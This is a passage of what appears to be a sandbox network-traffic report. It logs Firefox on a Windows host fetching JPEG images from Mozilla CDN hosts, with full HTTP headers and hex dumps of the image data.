2d 86 c1 7b 0c 0f cd 9f f5 84 7c b2 ca 1d c0 91 65 84 12 2c 96 5e 44 59 db 90 b1 69 06 e1 2b 6a 85 dc da 72 9f 9e 78 e7 98 e3 aa 5e 59 64 27 86 b3 Data Ascii: :S_u*u+W)D"2!#13BCRq4ASbcrs $EQat?ad}S"r&7l$@C<V0#ZE\IrVl!z's<VZlyA,O)zK-7-{\|e,^DYi+jrx^Yd'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	64203	34.36.165.17	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:01 UTC	423	OUT	GET /CAP5k4gWqcBGwir7bEEmBWveLMtvldFu-y_kyO3txFA=.9991.jpg HTTP/1.1 Host: tiles-cdn.prod.ads.prod.webservices.mozgcp.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site
2024-07-26 18:11:02 UTC	662	IN	HTTP/1.1 200 OK x-goog-generation: 1710789830399511 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 9991 x-goog-hash: crc32c=dxMo9A== x-goog-hash: md5=iPx75bUtnGfa5cArvePv2Q== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 9991 X-GUploader-UploadID: AHxI1nNArUMGrShLnzUlgwNfn0Ei6jSvWHN3eajbKoa4i8dI9DauAvSDk9T8_vtuIj9jwW83buM Server: UploadServer Date: Fri, 26 Jul 2024 18:07:07 GMT Age: 234 Last-Modified: Mon, 18 Mar 2024 19:23:50 GMT ETag: "88fc7be5b52d9c67dae5c02bbde3efd9" Content-Type: image/jpeg Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:02 UTC	728	IN	Data Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 5c 00 00 ff e1 03 8f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 30 20 37 39 2e 31 36 30 34 35 31 2c 20 32 30 31 37 2f 30 35 2f 30 36 2d 30 31 3a 30 38 3a 32 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d Data Ascii: ExifII*Ducky\http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xm
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 6f 73 68 29 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 61 36 62 64 64 32 63 34 2d 33 34 66 61 2d 34 36 61 62 2d 38 66 38 34 2d 65 34 61 61 37 30 31 33 66 32 37 33 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 61 38 35 35 36 33 30 63 2d 61 39 37 66 2d 31 32 34 64 2d 62 39 66 65 2d 61 62 62 38 32 31 37 36 39 62 64 63 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 01 01 Data Ascii: osh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:a6bdd2c4-34fa-46ab-8f84-e4aa7013f273" stRef:documentID="adobe:docid:photoshop:a855630c-a97f-124d-b9fe-abb821769bdc"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Adobed
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 4f 90 58 ab b2 be 83 1a 87 26 c2 73 e7 ae 9f c1 87 0d 0e 3c be bf ba 93 02 0d 95 0b 77 c2 ce 65 63 58 fa f2 cc 87 88 bc 9f a4 c6 1a 63 f3 2e df d9 e0 39 53 31 50 de 9d de a3 8e ae 09 12 53 a7 5d 55 a1 01 2f c4 5d a5 33 eb d5 69 ea 4a 6d c5 32 ea 14 46 4a 42 d2 7a 29 0b 49 e8 69 52 4f a1 91 96 a4 04 c9 9c 81 10 00 ca 5f e9 77 e7 6d f6 d1 f2 8a ef 84 b9 75 e4 87 76 a3 92 30 a6 e4 fb 79 59 35 d3 36 6a b3 9a 98 67 29 e3 88 4a 3d 10 9b 7a d6 1c 4b a9 49 17 73 ac b4 7e 26 ad 45 ae 4c 3a 2a 6c 09 02 c8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 01 ca dd ec 85 c6 ee 33 6f f6 fe cf f4 d4 ce cf 6d 06 41 b8 6c b2 f7 e1 7a 45 5d 63 d2 a2 b0 7f f7 5f 42 11 fa 40 8c 55 59 a7 ca f3 20 be cb 6f 2f 32 dc aa c2 45 b6 53 96 5d cc ca b2 7b 49 4a 35 b9 26 ca ca 4a Data Ascii: OX&s<wecXc.9S1PS]U/]3iJm2FJBz)IiRO_wmuv0yY56jg)J=zKIs~&EL:*l3omAlzE]c_B@UY o/2ES]{IJ5&J
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 e7 2b 79 1d 82 71 17 8e 7b c1 c9 2d c9 75 65 88 6d 16 13 2f 2c 9f 0d 95 12 5e 9c fb 69 f4 e0 56 46 35 6a 5e bc d9 4b 6a 3b 5a f4 ee 59 6b d0 09 a3 1a ba 1a 97 79 3f c9 4d d6 e5 f6 fc 6e 3f 22 f7 ae ed db ad c1 dc ab c5 da 4e 47 a8 b5 45 ac 84 83 34 56 d1 d6 21 66 7e 94 1a e8 fd ac 30 82 f2 23 51 ea a5 28 cc 64 e1 14 95 11 21 00 98 fa 42 56 e2 db 69 a6 9e 7d e7 9c 4b 2c 47 8e 85 38 e3 8e 2d 44 94 36 d3 68 23 52 d6 b5 19 25 29 49 19 99 9e 85 d4 08 37 44 66 b7 ed 73 f4 c7 e1 d6 98 6e 2b be 5e e3 65 7b 63 7b 92 41 63 21 a1 e2 d5 04 c7 ab a3 55 c6 79 29 76 3a 33 3b 38 86 89 4f cd 52 0f 57 21 46 75 b4 35 af 6a d6 e2 89 49 48 b2 9e 4b e0 8c ac f6 73 87 9c 53 e3 dd 4c 4a 4d 91 e3 9e cb ed 7c 18 6d 13 2d ab 0e Data Ascii: S+yq{-uem/,^iVF5j^Kj;ZYky?Mn?"NGE4V!f~0#Q(d!BVi}K,G8-D6h#R%)I7Dfsn+^e{c{Ac!Uy)v:3;8ORW!Fu5jIHKsSLJM\|m-
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 6c c5 6f 57 9e 32 d1 09 d3 55 10 92 77 14 78 97 f2 f7 72 fa 7b 29 78 71 c4 1d b8 df ce 2e 4e cc 37 3a c7 66 28 15 07 96 8b b4 ee 7a 6d c4 67 9c f5 d7 9d 40 af 6b b9 11 18 af 71 46 cc 88 ac ea 48 8a 68 70 fb 94 d3 ab 58 b6 b7 91 d3 d2 62 88 46 46 44 64 64 64 65 a9 19 75 23 23 f0 32 32 02 f0 f6 71 dc 77 21 cc 32 1a 2c 47 10 a0 ba ca f2 cc a6 d9 8a 0c 67 17 c7 23 3d 36 c2 c6 74 95 93 71 e1 c2 89 1d 2a 71 e7 9c 51 e8 94 a4 8c ff 00 46 a0 41 ba 23 3c cf 65 cf a7 ba a3 8d f3 70 8e 59 f3 6e b6 06 4d c8 8a c7 a3 e5 3b 5f b3 4d 3a 89 35 18 24 a4 91 39 1e c6 d1 d6 cc db b0 bd 68 cf 54 e8 6a 62 32 bf 07 a8 e1 13 89 16 17 6f 73 19 5d 81 40 00 00 00 00 00 00 00 00 00 00 80 f7 03 72 31 2d b1 a7 8f 7d 99 59 aa a6 aa 55 a3 55 0d cb 26 5e 78 bd 77 89 46 84 a9 2c a5 46 45 Data Ascii: loW2Uwxr{)xq.N7:f(zmg@kqFHhpXbFFDdddeu##22qw!2,Gg#=6tq*qQFA#<epYnM;_M:5$9hTjb2os]@r1-}YUU&^xwF,FE
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: fb 5d a7 d4 fe 48 f7 97 dc 86 f8 ee 8b 3a e6 ab b6 72 6e cf 4d ad 64 97 be e0 be 8d fb 4e b1 b9 15 c1 5d 49 34 be 77 2b e9 7e ca da 9b f7 40 de 96 23 87 ab 5a 84 72 a9 44 df bb cc fb 6d cf 8c 5f d4 6d f9 2b c0 99 fb 69 ce 7a 89 49 62 06 e7 d0 39 50 fa 92 94 1e 47 8d 92 e4 44 57 97 7b d1 0c cd d6 be 27 d8 6b 2f 91 0e b7 dd 3f ea 2f a7 e4 a8 d9 d7 f1 9d 89 ff 00 ad 65 39 db 7d 55 95 b7 ef c3 ca d7 3a f3 1a 7e f1 f0 c7 95 67 9a e6 9b 77 e2 47 e8 4f dd 9a f2 29 70 7e 9e 52 b7 f1 4c e7 12 ce 21 22 c7 12 c8 a9 f2 08 6a 49 29 4e 56 3e 97 14 8d 7c 9d 6b f1 a0 fe 4a 22 31 f4 27 67 6f fd 17 70 63 7c 7d 37 2a de 45 be d8 49 4a 9f 69 71 8b f2 49 26 79 b3 5a db d9 da 75 df 87 95 66 76 e5 d9 24 d7 a9 f0 7e 86 c8 b3 c4 6d e6 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 02 Data Ascii: ]H:rnMdN]I4w+~@#ZrDm_m+izIb9PGDW{'k/?/e9}U:~gwGO)p~RL!"jI)NV>\|kJ"1'gopc\|}7*EIJiqI&yZufv$~m
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 8e b2 ac e9 f7 2a 75 dd 0b c3 06 b1 79 a7 95 7a dd 98 f6 2f 7e 5e ca 47 fc 45 2a e6 dc c3 de 3c a9 2f 31 5d 65 5f 84 56 af 52 f4 b1 d6 ff 00 f5 04 9f 9c d9 1d eb 23 f9 a0 92 3c 69 de 17 8e fd f7 ac c6 50 c6 b9 6f 06 db ea b2 ab 3a 7f d4 9d 5f a6 2a 27 70 db 7e 1d f6 f6 0b 8b bb 19 64 4f eb ba 2f c3 1a 2f 5d 4f 23 6c f8 f7 ba 7b d9 60 dd f5 82 ec 6a e8 66 3a 4b 95 9b 65 86 f3 ce be 93 3f bc 70 db 7c fd 57 cc fc 95 a9 23 e7 e4 30 dd d3 78 5e de 9d e2 64 c7 37 2a 53 b7 8d 27 57 93 91 cd 29 49 75 fc 28 c9 f3 5c 6d 70 97 44 17 6b e0 5f 6f 3e f6 f4 1d b3 65 e3 d9 8c 67 75 74 2b 56 e8 94 7e db 4a 91 ed eb 97 98 ba 1e 27 86 e1 fc 7a db 4b 56 aa cd e4 d4 51 41 95 92 5d 58 4f 59 1b f2 df 6d 9e f7 5e 75 5a 12 49 4a 24 25 29 4a 48 88 8b 42 21 f6 13 65 ec 5d 07 bb 2d Data Ascii: uyz/~^GE</1]e_VR#<iPo:_'p~dO//]O#l{`jf:Ke?p\|W#0x^d7S'W)Iu(\mpDk_o>egut+V~J'zKVQA]XOYm^uZIJ$%)JHB!e]-
2024-07-26 18:11:02 UTC	923	IN	Data Raw: 75 7d b7 6b 46 d1 b1 a7 76 e6 6d e8 c2 e4 97 44 6d da 8f be dc e5 c2 31 93 51 4d be aa ae 97 44 fb 27 72 59 ba 5e 0e a9 3c ec eb b1 84 6c 5b 72 8a 7d 2e 53 7e ea e5 5d 6d 2a bf 3d 08 e7 62 f6 7e a7 66 b0 e6 68 62 b8 89 f7 73 94 56 19 35 d9 27 b7 f3 52 8d 24 5a 20 8f a9 32 d1 7d d6 d2 7e 5d 4f a9 98 e8 5e 1e 3b 8c c1 d8 5a 0c 70 ad 35 3b f3 a4 ef 5d a5 3e 25 ca 53 a3 ad 42 2b dd 84 5f 05 d3 c5 b3 5a ef 27 7f e4 6e 2d 49 e4 4e b1 b7 1f 76 dc 2b f3 63 fc cf 8c 9f 6f 91 22 75 8e f0 68 00 00 00 00 00 00 00 00 00 00 00 01 f2 69 25 16 87 e1 a6 9a 00 25 5e 57 b1 fb 51 9b 29 6e e4 b8 2e 3d 3a 52 f5 ee 9e cb 05 1e 49 99 f8 99 c8 8d e9 b8 67 f6 98 e4 3b cf b8 2d 99 b8 6a f3 f4 db 17 24 ff 00 6b 91 46 7d 3d 7c f0 e5 97 ad 9b 8e 85 de 16 b9 a6 51 63 65 5c 82 ec ad 63 Data Ascii: u}kFvmDm1QMD'rY^<l[r}.S~]m*=b~fhbsV5'R$Z 2}~]O^;Zp5;]>%SB+_Z'n-INv+co"uhi%%^WQ)n.=:RIg;-j$kF}=\|Qce\c

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.5	64208	34.120.237.76	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:01 UTC	512	OUT	GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fd1n0c1ufntxbvh.cloudfront.net%2Fphoto%2Feabcdc61%2F98254%2F1200x%2F HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site
2024-07-26 18:11:02 UTC	1125	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 11767 x-amzn-RequestId: f182d3bc-baa4-420f-a3ad-deba573bdf0f X-XSS-Protection: 1; mode=block Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=63072000; includeSubdomains; preload X-Frame-Options: DENY Content-Security-Policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: bgh78EJAoAMEYJg= X-Content-Type-Options: nosniff X-Amzn-Trace-Id: Root=1-66a349e5-5ff812fa7de31ab53cb4a22f;Parent=7713958431db435e;Sampled=0;lineage=69363f46:0 x-amzn-Remapped-Date: Fri, 26 Jul 2024 07:01:57 GMT X-Amz-Cf-Pop: HIO50-C1 X-Amz-Cf-Pop: SEA900-P2 X-Cache: Hit from cloudfront X-Amz-Cf-Id: Hn0dYYQp_RpylmNJcf4YFEte0jZgSmk3h1SE1GFc9YdZ1O30P4XTZA== Via: 1.1 8dbfaf7df256a75768461d934659b6b2.cloudfront.net (CloudFront), 1.1 0499a74409da2bff5223abb8f280cd5e.cloudfront.net (CloudFront), 1.1 google Date: Fri, 26 Jul 2024 07:08:57 GMT Age: 39724 ETag: "f26c89fd6171055ad8eea5febb7f5520f23faefa" Content-Type: image/jpeg Cache-Control: max-age=3600,public,public Alt-Svc: clear Connection: close
2024-07-26 18:11:02 UTC	265	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 01 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 ff c2 00 11 08 00 94 01 28 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 03 00 03 01 01 01 00 00 00 00 00 00 00 00 00 04 05 06 02 03 07 00 01 08 ff da 00 08 01 01 00 00 00 00 e2 be b4 97 3e cf 28 6d e5 8b f3 35 65 0f 9f cf 10 28 ef 52 91 96 27 86 3b 71 75 da 0a 13 20 26 2b 94 f6 2e 66 4c be e1 b3 70 Data Ascii: JFIF++&.%#%.&D5//5DNB>BN_UU_wqw++&.%#%.&D5//5DNB>BN_UU_wqw(">(m5e(R';qu &+.fLp
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 34 32 25 be 28 cf 0d 7d 53 4d 4a 0c 46 fc 8a a8 96 5c f7 40 4e 73 37 db 93 bc 25 fe 73 32 85 33 48 56 4f aa 98 f3 4c 03 64 45 0a 69 a7 e5 fc 98 bc d5 22 90 bd fb 87 a2 49 9e aa 07 6f e8 79 d4 d8 48 88 20 b6 f5 fc e4 0d 85 d6 09 a1 07 41 7f 13 f1 90 48 f6 e5 6f cb 19 60 72 56 5f a0 45 e7 36 46 cb 42 6a cf 52 d3 ec b9 f0 4f 05 f6 ff 00 b4 4e 5c 27 ad 8a 52 92 b1 c0 9c eb 67 59 e5 37 4c 7a 27 b5 73 1e a2 ab 95 ea b9 6d 06 ee cf 9f 73 13 0b 36 74 87 2b ae 75 3c 55 bb 9c 38 ca a2 23 73 69 8e 8b 42 e9 bf b9 f5 2e 98 6d 2f ac 45 44 a0 8e 6c fc aa 79 84 b2 04 d1 9c fc a1 e0 6e 43 98 52 cb a5 41 f5 09 d7 77 99 6a e7 1a a4 2a 85 a6 d1 87 2d bb e7 07 50 b0 5e e3 93 91 59 9c ff 00 47 80 6e 54 da bc bc 60 74 93 7d 7b a4 67 e8 0e 4f be c1 65 5b 4e 61 9e 33 db 42 cb 06 Data Ascii: 42%(}SMJF\@Ns7%s23HVOLdEi"IoyH AHo`rV_E6FBjRON\'RgY7Lz'sms6t+u<U8#siB.m/EDlynCRAwj*-P^YGnT`t}{gOe[Na3B
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 60 37 64 f3 61 da 8b dc 1e c2 6c 4f 09 cc 6e e2 37 06 4b 7d 5f 9a c8 bc 84 ef 2d 8c 6f 9b 4c b4 66 d0 36 49 69 ab 8c 91 7b 92 14 b3 f1 c9 c4 f2 1b 20 d6 db aa b7 e5 f1 df 2e ab a5 ea c9 5e 00 95 e3 08 51 e1 d6 3d 79 61 ab 33 ec 96 67 96 7f 95 67 9d 1e 72 97 51 16 86 a7 57 1e 4d cf 87 fc 6b a5 55 fb 56 fe c0 ea 66 3a d3 61 e2 88 80 82 49 27 b9 fb 31 e4 6b 5c d4 c9 69 c9 fa e3 a2 69 53 da 25 ce fe 37 56 24 81 d2 50 a4 7f 3f f0 a0 d2 ba a8 e5 21 92 1a 81 cf 57 a2 47 b4 f4 a5 fc 7e af a7 0a be d1 2c 5e 69 1b 05 78 69 fc 54 19 ad 7e 35 b9 77 d7 92 ac 64 f6 47 13 5f 12 dd 73 cb 18 2f ac 44 8a 32 05 1d c7 6e 90 d3 41 f1 44 67 3a a5 d9 d1 68 54 75 2a 23 33 96 a7 81 fc d9 bc e0 bf 8d 15 17 01 29 e7 9d 17 c3 1f c5 79 2d 59 06 a9 f8 89 f1 9f 1b 9e 52 8f 62 f4 7d 1f Data Ascii: `7dalOn7K}_-oLf6Ii{ .^Q=ya3ggrQWMkUVf:aI'1k\iiS%7V$P?!WG~,^ixiT~5wdG_s/D2nADg:hTu*#3)y-YRb}
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: a0 e3 d6 9d c0 66 cf a5 ff 00 02 39 63 e0 b4 ff 00 01 3e 6b 4d da 17 9a 6a bd f9 3e 2b 8a cb 97 2c 59 97 66 67 d7 82 1d a7 59 d7 8f f0 cf f9 ab 6c ca e2 67 bb 06 fa ea 34 3f 6c aa 41 f8 7c 9d f7 d0 0f f6 e6 6d 7c ba 33 3c 58 a5 28 5a ff 00 15 1a 86 d4 ad 38 dc d4 5c 1a 68 08 0d ac e3 6e 07 f5 72 75 eb 23 cc f7 eb e2 79 66 74 eb d1 66 65 eb 0f ac 6b 98 cf 5f 39 ec e4 ef 1d 3e 94 23 ad 85 d9 a6 ee 4f 5c 71 14 ac 61 4b 31 4c 75 e0 bf 2e c6 fb 4c e3 c2 7e 1b fc b7 db a1 26 b9 93 9a c9 ab 86 3a f5 65 87 8e 2e 42 0f c4 c5 58 3f bf 89 a9 6e 76 3d be fa 07 a3 f5 d5 a5 3b 4a 92 75 05 3e 29 0d dc 2e ae 67 25 c1 f4 71 7c d1 9d 83 1d 69 0a 7c 82 85 e6 e5 3b fb 30 71 e7 2e 29 c1 6b f6 d4 d4 ba 7f 1e 35 25 b8 fa 58 3d 92 d7 77 1f 2d db bb 88 5e 23 43 23 1c 8b b3 8f e5 Data Ascii: f9c>kMj>+,YfgYlg4?lA\|m\|3<X(Z8\hnru#yftfek_9>#O\qaK1Lu.L~&:e.BX?nv=;Ju>).g%q\|i\|;0q.)k5%X=w-^#C#
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 2b c7 4f 0c 22 6d a3 c8 bf 0d c6 cb 54 bc 76 45 53 ad f3 78 6a a4 1f f5 74 9d 87 b1 c8 24 df f1 da be 4d 46 ea 26 14 ee 3d 3f 59 13 1c f9 1c cb ae 27 d1 c6 f1 f3 61 f9 59 fc c1 48 a3 80 5b ef ae 5e 4f 9a 62 92 6e dd 66 d2 2f 21 41 d6 5b 08 30 2e 7c 46 f5 a6 8c 36 69 55 7d 83 65 18 21 ec a3 a3 d8 2d 99 9f ee f5 9b d5 1a 7d fb cc 8b 39 ff 00 cf 33 30 a6 04 1e e3 fb e9 0f 62 0f 4e 93 49 7e 87 b8 c6 c0 4b b9 23 b6 6c d4 b6 6d 43 34 83 b8 93 c3 4f a1 e6 c2 98 f2 72 02 9b 55 22 68 72 6a cf fe 12 13 a9 f1 e9 42 31 2a 9e 43 a8 8c 99 9e 97 55 00 d7 65 4d 5e c4 a8 7e 00 fb 39 8c de c6 24 73 ad 31 c5 01 38 14 1c 34 fd da a0 14 93 d5 20 93 cd 4f db c8 f0 19 f2 6a d5 c8 0d 5e 41 68 93 42 19 8f 9f 5b b4 9f c2 48 46 81 e0 9f ec bd 61 e4 13 36 b9 de 90 f3 4b 73 79 17 d2 Data Ascii: +O"mTvESxjt$MF&=?Y'aYH[^Obnf/!A[0.\|F6iU}e!-}930bNI~K#lmC4OrU"hrjB1*CUeM^~9$s184 Oj^AhB[HFa6Ksy
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: ac c4 2d 11 c8 04 3e 29 ea 62 d0 53 3a 2d 43 f6 00 f7 ea f4 18 f3 46 bf a3 9d 36 f6 ba 0b e4 99 9a f1 b4 c3 6c da 65 4a 53 35 38 6b b7 6d 08 4b ab b3 32 78 33 16 5a d2 94 64 57 a3 11 c7 5a af a6 43 cc a8 e6 54 32 37 71 d6 09 4f 3e 6c 8b 24 03 af 90 b1 fc 08 fd 0e b8 5e 3f 26 bd 21 2f 3f 35 f9 4f 11 87 06 e7 48 4c 85 a4 e7 10 fe 08 bd 5f f4 27 c7 a3 67 f5 f7 fa ee c0 16 2a 07 61 2b b6 6b 3b 22 a9 33 f9 2f 35 82 75 5c fb 1d 43 fc 87 99 d0 c6 95 da e5 b7 5a eb 70 a2 f4 ed 4b de 77 af 8d 58 35 28 c6 9d 98 f9 37 13 57 78 57 b9 eb 33 9b 0e e7 b2 b7 2c ac 9a cf 8d 1c 75 9c 9b b2 bd 49 66 bc 92 79 f6 85 1d ba f8 b6 79 f2 9c 19 cd ac 17 9e df 8c e1 ce f1 f5 df 47 5f 2b ee 6f c7 f7 66 e9 37 ec 87 c6 51 63 77 9f 43 97 e4 ef a5 a7 5d da 19 5d 7b a9 62 49 3a 54 8f 1f Data Ascii: ->)bS:-CF6leJS58kmK2x3ZdWZCT27qO>l$^?&!/?5OHL_'g*a+k;"3/5u\CZpKwX5(7WxW3,uIfyyG_+of7QcwC]]{bI:T
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 8b 76 43 0d 41 2c 67 84 91 b0 a4 ba a1 59 0c 02 3f 8d 28 16 64 46 30 0f 82 f5 35 da 2e 87 ce 9b 1f 6a 03 09 da af 3f 64 60 c0 38 8c a8 86 0c d8 cf 07 33 1b ef d2 b3 60 2a 75 1e 1a 53 b2 c3 4f 74 73 11 f1 54 6e a3 53 a6 9f 7a 9d b1 d6 ae db 5e cb 05 ed ae 14 ef 60 83 70 5a 7c 34 a7 55 c1 8b 48 61 cb e4 bf 6a 0e ca ae 5b 09 c7 9d 22 37 69 a8 23 ce a1 ad e4 67 8b ac 0e 74 06 45 5d 24 37 e1 c7 6a b4 14 18 00 06 c8 e2 20 52 8e 07 0c 05 c5 f2 3b d0 d4 25 d3 0e 7c 14 ec 6a d8 62 e8 01 05 4a 8c 8e 5f 86 8b e9 1b 50 a6 d2 8e 8c 01 df 13 b3 63 e3 4d 8e 4a ae 75 35 b6 59 11 41 22 d3 bb 45 bb a6 34 93 ca af 5e 6e d2 41 01 0f 56 c4 6d e5 53 1a 34 83 53 b8 e9 49 8e 45 57 61 5e 87 6d af 58 17 18 7f 5b 22 27 13 cb 79 d2 99 d5 4b 2e 18 17 5d f2 cb fe 26 85 94 b7 6c 34 4e Data Ascii: vCA,gY?(dF05.j?d`83`*uSOtsTnSz^`pZ\|4UHaj["7i#gtE]$7j R;%\|jbJ_PcMJu5YA"E4^nAVmS4SIEWa^mX["'yK.]&l4N
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: f6 dd 87 06 09 38 a6 07 9f 98 a6 79 45 09 a9 0c e2 6e 39 53 13 0a 35 88 1b 0a 36 2e 8f db d6 e8 c8 c0 f3 0d bd 5b 0d 79 01 dd 82 ca ca f8 30 15 74 76 86 eb 11 b2 9c 88 86 1a e5 b6 9a d5 f2 a0 00 79 b1 a5 45 07 4d e9 8a f7 68 3e 2c 72 3a d2 5e ba 2e a0 3a 71 0d 0f 9f bb 4e 8c 84 73 19 0f 68 52 96 5f d3 45 16 e9 d6 20 61 85 03 20 b0 8d 3a b7 85 23 bd c0 d9 0d 46 8c 31 1d 57 a8 ab 69 77 d2 54 00 33 ed 2d 71 43 1d fc 79 eb 40 af 62 58 94 24 5d 89 0c 57 94 f7 85 7a 21 57 36 ee 82 81 76 53 dd 32 71 3d dd 0d 59 f4 57 39 b0 12 cf 1a c0 6e cc 4a cd 4b 68 4c d4 c0 83 24 fc ba 53 58 7d 98 1d 70 ca 78 6b 41 b6 fd 68 58 6c 75 d8 b1 14 d6 d6 e1 c8 6f 8a 0e f5 0b d1 88 26 0e 43 d9 1f 3a 6d 94 1a bb 61 ef 1c 8e e9 19 43 1e ad 48 f2 54 d3 19 51 d4 50 10 28 16 9c 63 3d be Data Ascii: 8yEn9S56.[y0tvyEMh>,r:^.:qNshR_E a :#F1WiwT3-qCy@bX$]Wz!W6vS2q=YW9nJKhL$SX}pxkAhXluo&C:maCHTQP(c=
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 0a d1 db 1e f0 b4 a2 b8 60 44 47 85 38 8a 1b b7 8f c3 f0 d3 5c 92 40 82 53 bc 7e f4 78 74 39 e0 2d 6c 1b 1e 6c 69 44 b7 01 00 9f 36 a2 59 88 06 63 11 a5 2e 53 0b cb 95 21 96 42 63 cc 29 ab 3c 40 a8 04 da b6 bb 68 de 35 78 76 72 dd 7b df b9 a2 65 0f 4f 0a 57 42 3c 75 a9 df c6 93 bd 1d 3a d7 20 63 fe 34 02 64 07 96 fe a6 13 48 67 e7 cb f6 a5 1a c0 d1 bf 8f 51 11 47 4d 3a d1 79 20 ac c6 20 fb de 74 0e 41 e7 43 b6 90 b4 f9 0d 35 d6 b3 83 8e 90 29 5e 35 6d c5 00 b2 ad cb e7 5b 93 4c ea 35 db 8a 92 f3 db 2b 3a 4e bc aa cf a3 29 c8 02 1e 33 0b 0d 56 df 84 16 d0 9b b3 26 96 c3 09 9f 0a b7 88 95 12 4f ea a6 32 72 3a fe 75 30 38 a7 5a 88 53 04 c1 eb c3 ad 32 4e 01 b8 10 73 e7 af c5 ca 93 87 15 b4 02 42 f3 e1 f3 a5 0c 15 ad ac 12 3b a7 2a 62 c4 36 fa 50 b6 aa c2 00 Data Ascii: `DG8\@S~xt9-lliD6Yc.S!Bc)<@h5xvr{eOWB<u: c4dHgQGM:y tAC5)^5m[L5+:N)3V&O2r:u08ZS2NsB;*b6P
